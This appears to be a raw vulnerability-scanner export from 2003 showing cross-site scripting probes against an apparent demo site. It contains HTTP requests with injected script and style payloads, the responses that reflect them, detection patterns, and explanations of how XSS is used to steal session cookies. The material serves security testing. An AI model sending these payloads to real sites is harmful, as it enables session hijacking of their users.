Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=<attack>>"><script>alert('XSS')</script></attack>&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /_vti_pvt/DocURL.indexOf( HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_pvt/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/_vti_pvt/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /login/login.asp?Action=Login&UserName=>"><script>alert("XSS")</script>&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 355
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: >"><script>alert("XSS")</script></h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?Action=Login&UserName=<attack>>"><script>alert("XSS")</script></attack>&Password=333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/><var name="path"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=>"><script>alert("XSS")</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 402
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = >"><script>alert("XSS")</script></P><br>
<P>The <b>hidden</b> parameter "txtHidden" = >"><script>alert("XSS")</script></P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=<attack>>"><script>alert("XSS")</script></attack><script>alert\("XSS"\)<\/script>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=>"><script>alert('XSS')</script>&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 348
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = >"><script>alert('XSS')</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=<attack>>"><script>alert('XSS')</script></attack>&txtFirstName=Joe&txtLastName=Swinney<script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=1"style="background:url(javascript:alert('XSS'))"%20"&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:24 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=--><script>alert('XSS')</script>&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=<attack>--><script>alert('XSS')</script></attack>&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=>"><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 186
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was >"><script>alert('XSS')</script>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/testing/
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack>>"><script>alert('XSS')</script></attack><script>alert\('XSS'\)<\/script>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=>"><script>alert('XSS')</script>&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
